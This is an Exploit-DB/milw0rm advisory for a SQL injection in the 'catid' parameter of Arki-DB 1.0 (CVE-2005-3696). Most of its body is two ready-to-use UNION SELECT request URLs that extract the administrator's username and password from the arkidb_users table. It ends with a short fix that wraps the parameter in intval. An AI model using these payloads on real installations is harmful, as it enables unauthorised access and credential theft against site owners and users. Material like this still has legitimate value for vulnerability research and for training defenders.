Arki-DB 1.0 - 'catid' SQL Injection

Author: Devil-00
type: webapps
platform: php
port: 
date_added: 2005-11-13  
date_updated: 2016-06-13  
verified: 1  
codes: OSVDB-20944;CVE-2005-3696  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comarkidb-10.zip  

raw file: 1320.txt  
[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] devil-00@s4a.cc
[~]
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By  Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~]   Devil-00
[~]   www.s4a.cc << We Love You
[~]   www.securitygurus.net << Love you 2 :P
[~]   HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~]  [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]
[~]  [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~]  Line 75 .. File /source/view.php
[~]
[~]   $catid = $this->get('catid');
[~] Change To
[~]   $catid = intval($this->get('catid'));
[~]----------------------------------------------------------------------------------------------------------

[~] milw0rm.com [2005-11-14]